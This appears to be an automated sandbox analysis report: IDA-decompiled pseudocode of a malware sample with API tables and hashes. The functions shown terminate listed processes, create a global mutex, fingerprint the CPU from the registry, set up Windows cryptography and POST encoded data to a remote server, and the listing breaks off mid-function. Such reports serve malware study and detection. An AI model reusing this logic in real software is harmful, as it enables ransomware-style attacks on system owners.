                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
                                    • CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
                                    • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
                                    • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                    • String ID: Global\
                                    • API String ID: 3131499543-188423391
                                    • Opcode ID: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
                                    • Instruction ID: cdf7a54993bd3f3f5c11b4a493e5204001f3a608bd5b5e4e568676fe4fbc45d2
                                    • Opcode Fuzzy Hash: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
                                    • Instruction Fuzzy Hash: 23212371650712BBE124B724DC4AF7F7B5CEB80B11F600239BA05B61D1AA98790B8AE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F584A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                    				int _t8;
                                    				int _t9;
                                    				int _t10;
                                    				void* _t15;
                                    				WCHAR* _t17;
                                    				void* _t18;
                                    				signed int _t23;
                                    				void* _t24;
                                    				void* _t28;
                                    
                                    				_t17 = __ecx;
                                    				_t15 = __ebx;
                                    				while(1) {
                                    					L2:
                                    					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                    					if(_t8 == 0) {
                                    						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                    						if(_t18 != 0) {
                                    							TerminateProcess(_t18, 0);
                                    							CloseHandle(_t18);
                                    						}
                                    					}
                                    					_t23 = _t23 + 1;
                                    					_t5 = _t15 + 0x24; // 0x24
                                    					_t17 = _t5;
                                    					if(_t23 < 0x27) {
                                    						continue;
                                    					}
                                    					L7:
                                    					_t24 = _a12;
                                    					_t9 = Process32NextW(_t24, _t15);
                                    					_t7 = _t15 + 0x24; // 0x24
                                    					_t17 = _t7;
                                    					if(_t9 != 0) {
                                    						_t23 = 0;
                                    						do {
                                    							goto L2;
                                    						} while (_t23 < 0x27);
                                    						goto L7;
                                    					}
                                    					if(_t15 != 0) {
                                    						VirtualFree(_t15, 0, 0x8000); // executed
                                    					}
                                    					_t10 = FindCloseChangeNotification(_t24); // executed
                                    					return _t10;
                                    					L2:
                                    					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                    					if(_t8 == 0) {
                                    						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                    						if(_t18 != 0) {
                                    							TerminateProcess(_t18, 0);
                                    							CloseHandle(_t18);
                                    						}
                                    					}
                                    					_t23 = _t23 + 1;
                                    					_t5 = _t15 + 0x24; // 0x24
                                    					_t17 = _t5;
                                    				}
                                    			}












                                    0x0f584a78
                                    0x0f584a78
                                    0x0f584a80
                                    0x0f584a80
                                    0x0f584a85
                                    0x0f584a8d
                                    0x0f584a9b
                                    0x0f584a9f
                                    0x0f584aa4
                                    0x0f584ab1
                                    0x0f584ab1
                                    0x0f584a9f
                                    0x0f584abb
                                    0x0f584abc
                                    0x0f584abc
                                    0x0f584ac2
                                    0x00000000
                                    0x00000000
                                    0x0f584ac4
                                    0x0f584ac4
                                    0x0f584aca
                                    0x0f584ad0
                                    0x0f584ad0
                                    0x0f584ad5
                                    0x0f584a74
                                    0x0f584a80
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584a80
                                    0x0f584ad9
                                    0x0f584ae3
                                    0x0f584ae3
                                    0x0f584aea
                                    0x0f584af2
                                    0x0f584a80
                                    0x0f584a85
                                    0x0f584a8d
                                    0x0f584a9b
                                    0x0f584a9f
                                    0x0f584aa4
                                    0x0f584ab1
                                    0x0f584ab1
                                    0x0f584a9f
                                    0x0f584abb
                                    0x0f584abc
                                    0x0f584abc
                                    0x0f584abf

                                    APIs
                                    • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
                                    • CloseHandle.KERNEL32(00000000), ref: 0F584AB1
                                    • Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0F584AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
                                    • String ID: i)w
                                    • API String ID: 3573210778-1280834553
                                    • Opcode ID: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
                                    • Instruction ID: afc5d68616beee0a847f8aa24f2523bddbe59793893879677c402e05be8aec33
                                    • Opcode Fuzzy Hash: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
                                    • Instruction Fuzzy Hash: 7301FE32100102FFD710AF50AD85B5A77AEFF84712F314035FE09BA141D734981B9B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F5835C0(intOrPtr __ecx, intOrPtr __edx) {
                                    				long _v8;
                                    				long _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				long _v24;
                                    				void* _t12;
                                    				void* _t14;
                                    				long _t17;
                                    				void* _t18;
                                    				int _t21;
                                    				void* _t25;
                                    				char* _t29;
                                    				void* _t37;
                                    				void* _t39;
                                    
                                    				_v16 = __edx;
                                    				_v20 = __ecx;
                                    				_v12 = 0;
                                    				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
                                    				_t39 = _t12;
                                    				if(_t39 != 0) {
                                    					GetModuleFileNameW(0, _t39, 0x100);
                                    					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
                                    					_t37 = _t14;
                                    					if(_t37 != 0xffffffff) {
                                    						_t17 = GetFileSize(_t37, 0);
                                    						_v8 = _t17;
                                    						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                    						_t25 = _t18;
                                    						if(_t25 != 0) {
                                    							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
                                    							if(_t21 != 0) {
                                    								_t29 = _v8 - 1 + _t25;
                                    								if( *_t29 != 0) {
                                    									do {
                                    										_t29 = _t29 - 1;
                                    									} while ( *_t29 != 0);
                                    									E0F5834F0(_t29 + 1, _v20, _v16);
                                    									_t32 =  !=  ? 1 : 0;
                                    									_v12 =  !=  ? 1 : 0;
                                    								}
                                    							}
                                    							VirtualFree(_t25, 0, 0x8000); // executed
                                    						}
                                    						FindCloseChangeNotification(_t37); // executed
                                    					}
                                    					VirtualFree(_t39, 0, 0x8000); // executed
                                    					return _v12;
                                    				} else {
                                    					return _t12;
                                    				}
                                    			}

















                                    0x0f5835dc
                                    0x0f5835df
                                    0x0f5835e2
                                    0x0f5835e9
                                    0x0f5835eb
                                    0x0f5835ef
                                    0x0f583600
                                    0x0f583616
                                    0x0f58361c
                                    0x0f583621
                                    0x0f583626
                                    0x0f583636
                                    0x0f583639
                                    0x0f58363b
                                    0x0f58363f
                                    0x0f58364c
                                    0x0f583654
                                    0x0f58365a
                                    0x0f58365f
                                    0x0f583661
                                    0x0f583661
                                    0x0f583662
                                    0x0f58366e
                                    0x0f58367f
                                    0x0f583682
                                    0x0f583682
                                    0x0f58365f
                                    0x0f58368d
                                    0x0f58368d
                                    0x0f583694
                                    0x0f583694
                                    0x0f5836a2
                                    0x0f5836b1
                                    0x0f5835f6
                                    0x0f5835f6
                                    0x0f5835f6

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00000A00,00003000,00000004,?,77296980), ref: 0F5835E9
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,772D82B0), ref: 0F583600
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F583616
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0F583626
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0F583639
                                    • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0F58364C
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F58368D
                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0F583694
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5836A2
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
                                    • String ID:
                                    • API String ID: 511603811-0
                                    • Opcode ID: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
                                    • Instruction ID: e599193e7c4041a2befb8ab07b480e90e0128ce1b3f4c355849a55e32297ea98
                                    • Opcode Fuzzy Hash: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
                                    • Instruction Fuzzy Hash: 1121F931B403047BFB216BA99D86FAE7B68EB44B21F200069FB05BA3C1D7B895179754
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F587D70(intOrPtr* __ecx) {
                                    				int _t20;
                                    				intOrPtr* _t24;
                                    
                                    				_t24 = __ecx;
                                    				if( *__ecx != 0) {
                                    					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                    					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                    				}
                                    				return _t20;
                                    			}





                                    0x0f587d71
                                    0x0f587d7d
                                    0x0f587d89
                                    0x0f587d89
                                    0x0f587d8f
                                    0x0f587d9b
                                    0x0f587d9b
                                    0x0f587da1
                                    0x0f587dad
                                    0x0f587dad
                                    0x0f587db3
                                    0x0f587dbf
                                    0x0f587dbf
                                    0x0f587dc5
                                    0x0f587dd1
                                    0x0f587dd1
                                    0x0f587dd7
                                    0x0f587de3
                                    0x0f587de3
                                    0x0f587de9
                                    0x0f587df5
                                    0x0f587df5
                                    0x0f587dfb
                                    0x0f587e07
                                    0x0f587e07
                                    0x0f587e0d
                                    0x0f587e19
                                    0x0f587e19
                                    0x0f587e22
                                    0x00000000
                                    0x0f587e31
                                    0x0f587e35

                                    APIs
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D89
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D9B
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DAD
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DBF
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DD1
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DE3
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DF5
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E07
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E19
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E31
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
                                    • Instruction ID: a4cfbd202773137b3d5cac9fa628adb43f671732b21f4072b2ea178205ee5206
                                    • Opcode Fuzzy Hash: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
                                    • Instruction Fuzzy Hash: 3321D030240B04AAE6766A15DC06FA6B7E1BB44B05F75493CE2C2344F18BF5749ADF04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F587410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                    				void* _v8;
                                    				long _t14;
                                    				long _t18;
                                    
                                    				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                    				if(_t14 != 0) {
                                    					return 0;
                                    				} else {
                                    					_a8 = _a20;
                                    					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                    					if(_t18 != 0) {
                                    						GetLastError();
                                    						RegCloseKey(_v8);
                                    						return 0;
                                    					} else {
                                    						_t11 = _t18 + 1; // 0x1, executed
                                    						RegCloseKey(_v8); // executed
                                    						return _t11;
                                    					}
                                    				}
                                    			}






                                    0x0f587426
                                    0x0f587430
                                    0x0f587484
                                    0x0f587432
                                    0x0f587435
                                    0x0f587447
                                    0x0f58744f
                                    0x0f587466
                                    0x0f58746f
                                    0x0f58747b
                                    0x0f587451
                                    0x0f587454
                                    0x0f587457
                                    0x0f587463
                                    0x0f587463
                                    0x0f58744f

                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587426
                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587447
                                    • RegCloseKey.KERNELBASE(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587457
                                    • GetLastError.KERNEL32(?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587466
                                    • RegCloseKey.ADVAPI32(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F58746F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$ErrorLastOpenQueryValue
                                    • String ID:
                                    • API String ID: 2437438455-0
                                    • Opcode ID: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
                                    • Instruction ID: 5f62967033a2f304c42e657828e8f883623c85e2f16a5d1cc562925364204c76
                                    • Opcode Fuzzy Hash: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
                                    • Instruction Fuzzy Hash: FB01213260011DFBDB109F94ED05DDA7F68EB08362B104162FE05E6221D7329A35BBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E0F586550(void** __ecx) {
                                    				void** _v8;
                                    				void* _t19;
                                    				void* _t20;
                                    				void* _t24;
                                    
                                    				_push(__ecx);
                                    				_v8 = __ecx;
                                    				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
                                    				_v8[1] = _t19;
                                    				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
                                    				 *_v8 = _t20;
                                    				_v8[3] = 0x123;
                                    				_v8[2] = 0x515;
                                    				_t13 =  &(_v8[1]); // 0xc7000000
                                    				_t24 = E0F5863E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
                                    				if(_t24 == 0) {
                                    					_v8[4] = 1;
                                    				}
                                    				_v8[4] = 0;
                                    				return _v8;
                                    			}







                                    0x0f586553
                                    0x0f586554
                                    0x0f586565
                                    0x0f58656e
                                    0x0f58657f
                                    0x0f586588
                                    0x0f58658d
                                    0x0f586597
                                    0x0f5865b5
                                    0x0f5865b9
                                    0x0f5865c3
                                    0x0f5865c8
                                    0x0f5865c8
                                    0x0f5865d2
                                    0x0f5865df

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00000123,00003000,00000004,?,?,0F584B9E), ref: 0F586565
                                    • VirtualAlloc.KERNELBASE(00000000,00000515,00003000,00000004,?,0F584B9E), ref: 0F58657F
                                      • Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
                                      • Part of subcall function 0F5863E0: GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
                                      • Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AcquireAllocContextCryptVirtual$ErrorLast
                                    • String ID:
                                    • API String ID: 3824161113-0
                                    • Opcode ID: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
                                    • Instruction ID: 3fa041b42630bf18f33f63427462cb35c558df6ff126a82b1f3e654db32ba0ff
                                    • Opcode Fuzzy Hash: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
                                    • Instruction Fuzzy Hash: 0E11F774A41208EBD704DF94CA95F99BBF5EB88705F208188E904AB381D7B5AF119B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E0F5853D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
                                    				int _v8;
                                    				void* _v12;
                                    				CHAR* _v16;
                                    				void* _v20;
                                    				void** _v24;
                                    				void* _v28;
                                    				void* _v32;
                                    				char _v36;
                                    				void* _v84;
                                    				CHAR* _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				char _v104;
                                    				short _v128;
                                    				void* __esi;
                                    				int _t40;
                                    				BYTE* _t41;
                                    				int _t43;
                                    				void* _t61;
                                    				void* _t65;
                                    				void* _t68;
                                    				void* _t69;
                                    				intOrPtr _t71;
                                    				CHAR* _t80;
                                    				char* _t82;
                                    				CHAR* _t83;
                                    				void* _t84;
                                    				CHAR* _t88;
                                    				int _t96;
                                    				void* _t98;
                                    				void* _t99;
                                    				int _t100;
                                    				void* _t101;
                                    				long _t102;
                                    				BYTE* _t103;
                                    				CHAR* _t105;
                                    				void* _t106;
                                    				void* _t108;
                                    
                                    				_t82 = __ecx;
                                    				_v16 = __edx;
                                    				_t40 = lstrlenA(__ecx) + 1;
                                    				_v8 = _t40;
                                    				_t3 = _t40 + 1; // 0x2
                                    				_t102 = _t3;
                                    				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
                                    				_v20 = _t41;
                                    				if(_t41 == 0 || _v8 >= _t102) {
                                    					_t103 = 0;
                                    					__eflags = 0;
                                    				} else {
                                    					_t103 = _t41;
                                    				}
                                    				_t98 = 0;
                                    				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
                                    				_t116 = _t43;
                                    				if(_t43 == 0) {
                                    					GetLastError();
                                    					goto L14;
                                    				} else {
                                    					_t96 = _v8;
                                    					E0F585F00(_t103, _t96, _t103);
                                    					asm("xorps xmm0, xmm0");
                                    					_t88 =  &_v36;
                                    					asm("movdqu [ebp-0x20], xmm0");
                                    					E0F5833E0(_t88, _t116, _t103);
                                    					if(_v36 != 0) {
                                    						E0F585350();
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						_push(_t82);
                                    						_push(_t103);
                                    						_t83 = _t88;
                                    						_v96 = _t96;
                                    						_push(0);
                                    						_v88 = _t83;
                                    						E0F587E40( &_v104);
                                    						_v92 = E0F585220();
                                    						_t99 = 0x400 + lstrlenA(_t83) * 2;
                                    						_t22 = _t99 + 1; // 0x1
                                    						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
                                    						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                    						__eflags = _t84;
                                    						if(_t84 == 0) {
                                    							L20:
                                    							_t105 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t24 = _t99 + 1; // 0x1
                                    							__eflags = _t99 - _t24;
                                    							if(_t99 >= _t24) {
                                    								goto L20;
                                    							} else {
                                    								_t105 = _t84;
                                    							}
                                    						}
                                    						lstrcatA(_t105, _v16);
                                    						asm("movdqu xmm0, [0xf58fb40]");
                                    						asm("movdqu [ebp-0x78], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb50]");
                                    						asm("movdqu [ebp-0x68], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb60]");
                                    						asm("movdqu [ebp-0x58], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb70]");
                                    						asm("movdqu [ebp-0x48], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb80]");
                                    						asm("movdqu [ebp-0x38], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb90]");
                                    						asm("movdqu [ebp-0x28], xmm0");
                                    						lstrlenA(_t105);
                                    						_t100 = 0;
                                    						_push(lstrlenW( &_v128));
                                    						_push( &_v128);
                                    						_push(L"POST");
                                    						_push(0x31fff);
                                    						_push(_v12);
                                    						_push(lstrlenA(_t105));
                                    						_push(_t105);
                                    						_t106 = _v20;
                                    						_push(L"popkadurak");
                                    						_push(_t106);
                                    						_t61 = E0F588050( &_v32);
                                    						__eflags = _t61;
                                    						if(_t61 != 0) {
                                    							__eflags = _a4;
                                    							_t100 = 1;
                                    							if(_a4 != 0) {
                                    								_v16 = 0;
                                    								_t68 = E0F5853D0(_v12,  &_v16);
                                    								__eflags = _t68;
                                    								if(_t68 == 0) {
                                    									_t100 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									_t69 = _v16;
                                    									__eflags = _t69;
                                    									if(_t69 != 0) {
                                    										 *_v24 = _t69;
                                    									}
                                    								}
                                    							}
                                    						}
                                    						VirtualFree(_t106, 0, 0x8000);
                                    						VirtualFree(_v12, 0, 0x8000);
                                    						VirtualFree(_t84, 0, 0x8000);
                                    						_t65 = _v28;
                                    						__eflags = _t65;
                                    						if(_t65 != 0) {
                                    							InternetCloseHandle(_t65);
                                    						}
                                    						return _t100;
                                    					} else {
                                    						_t101 = _v32;
                                    						_t71 =  *0xf592a60; // 0x0
                                    						_t108 = _v28;
                                    						_t72 =  !=  ? 0 : _t71;
                                    						_v12 = 1;
                                    						 *0xf592a60 =  !=  ? 0 : _t71;
                                    						if(_t108 != 0) {
                                    							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
                                    							 *_v16 = _t80;
                                    							if(_t80 != 0) {
                                    								lstrcpyA(_t80, _t108);
                                    							}
                                    						}
                                    						_t73 = GetProcessHeap;
                                    						if(_t101 != 0) {
                                    							HeapFree(GetProcessHeap(), 0, _t101);
                                    							_t73 = GetProcessHeap;
                                    						}
                                    						if(_t108 != 0) {
                                    							HeapFree( *_t73(), 0, _t108);
                                    						}
                                    						_t98 = _v12;
                                    						L14:
                                    						VirtualFree(_v20, 0, 0x8000);
                                    						return _t98;
                                    					}
                                    				}
                                    			}









































                                    0x0f5853d9
                                    0x0f5853db
                                    0x0f5853e5
                                    0x0f5853ed
                                    0x0f5853f0
                                    0x0f5853f0
